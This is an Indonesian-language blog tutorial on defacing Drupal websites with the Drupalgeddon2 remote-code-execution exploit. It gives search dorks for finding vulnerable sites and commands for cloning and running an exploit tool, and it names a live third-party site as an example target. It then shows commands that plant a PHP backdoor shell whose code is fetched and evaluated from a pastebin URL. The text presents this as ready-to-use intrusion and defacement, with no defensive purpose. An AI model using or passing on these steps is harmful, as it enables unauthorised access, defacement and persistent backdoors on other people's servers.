DRUPAL RCE UPLOAD SHELL
hai ketemu lagi dengan saya , kali ini saya membagikan tutorial deface menggunakan teknik DRUPAL RCE , tutorial deface ini menggunakan tools di terminal dengan bahasa Ruby . langsung saja tutorial nya ya :)
metode ini di gunakan untuk website yang memakai CMS Drupal
dork :
inurl:"*drupal_ajax"
intext:"powered by drupal"
dork kembangin
setelah menemukan site drupal tinggal eksekusi pakai tools nya saja
buka terminal :
$ apt-get install git
$ gem install ruby
$ git clone https://github.com/dreadlocked/Drupalgeddon2
buka file nya
$ cd Drupalgeddon2cara pakai nya
$ ruby drupalgeddon2.rb <site>
contoh live target :
$ ruby drupalgeddon2.rb http://boatsmedia.in/
jika berhasil nanti web nya ter connect ke terminal lo
cek dengan perintah
$ uname -ajika nanti muncul kernal web maka artinya berhasil
tinggal eksekusi deh . kalo mau tanam shell tinggal ketik gini
$ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
fungsi nya command di atas adalah membuat file shell.php dengan shell backdoor file get content
jika di buka di web tersebut dan blank , coba pakai cara wget , coba command berikut
$ wget https://pastebin.com/raw/en5tp4kX -O shell.php
#tulisan yang saya merahin itu url pastebin LAX shell ( password shell = LAX ) bisa juga di ganti shell kalian sendiri
cara manggil shell nya
http://site.com/shell.php
nah berhasil kita tanam shell nya , tinggal eksekusi deh wkwkwk
JIKA UPLOAD SHELL GAGAL KITA LANGSUNG WRITE FILE AJA LEWAT TERMINAL
$ echo ' ISI ' > namafile.php
keluar dari tools nya :
$ exit
sekian tutorial dari saya semoga bermanfaat
thanks to :
Kamiki Gh0st_Coder
Khalidul Mr.GoKill
Share This :
comment 1 komentar
more_vertLangsung backconnect aj 😂
Delete April 23, 2018 at 4:22 PM